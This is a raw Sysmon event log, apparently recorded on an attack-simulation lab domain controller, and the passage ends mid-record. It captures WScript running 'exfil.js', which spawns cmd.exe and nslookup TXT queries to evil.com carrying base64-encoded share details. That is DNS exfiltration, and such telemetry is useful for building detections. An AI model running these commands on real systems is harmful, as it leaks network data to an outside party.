14:16:26.606{2E1864BB-17BA-629A-E23F-000000005F02}73607304C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-E13F-000000005F02}7804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.606{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-E23F-000000005F02}7360C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.601{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.601{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.601{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.601{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.600{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-E13F-000000005F02}7804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.600{2E1864BB-17A1-629A-783D-000000005F02}55528044C:\Windows\System32\WScript.exe{2E1864BB-17BA-629A-E13F-000000005F02}7804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.600{2E1864BB-17BA-629A-E13F-000000005F02}7804C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldub.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.597{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhwmsqh.tmpMD5=74AA98EC4B1C82029578D90E2343E510,SHA256=BCED258190799681E04DEC80A23A2247E8F332523DBBC8B2CBECAB9A40B2F90E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.566{2E1864BB-17BA-629A-DF3F-000000005F02}12921488C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-E03F-000000005F02}6180C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.566{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.566{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.566{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.566{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.566{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-E03F-000000005F02}6180C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.566{2E1864BB-17BA-629A-DE3F-000000005F02}46364468C:\Windows\system32\cmd.exe{2E1864BB-17BA-629A-E03F-000000005F02}6180C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.573{2E1864BB-17BA-629A-E03F-000000005F02}6180C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BA-629A-DE3F-000000005F02}4636C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhwmsqh.tmp 2>&1 23542300x8000000000000000199002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.566{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=256EB7EA970EFCC710D0A2EBD9DA41A3,SHA256=A93B794C98FD877E178DB4C6A3976407251313C5CEC85657FA71345074D89965,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.550{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-DF3F-000000005F02}1292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.550{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-DF3F-000000005F02}1292C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.550{2E1864BB-17BA-629A-DF3F-000000005F02}12921488C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-DE3F-000000005F02}4636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.534{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-DF3F-000000005F02}1292C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.534{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.534{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.534{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.534{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.534{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-DE3F-000000005F02}4636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.534{2E1864BB-17A1-629A-783D-000000005F02}55527988C:\Windows\System32\WScript.exe{2E1864BB-17BA-629A-DE3F-000000005F02}4636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.538{2E1864BB-17BA-629A-DE3F-000000005F02}4636C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhwmsqh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.534{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbuc.tmpMD5=C7EBA965EA2938C9D738B256A5573F35,SHA256=722A438985A6A7CB05BECB0E5BC6B8755AA777F6146D0E8D8A702198A5DDD2AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.503{2E1864BB-17BA-629A-DC3F-000000005F02}32124812C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-DD3F-000000005F02}2872C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 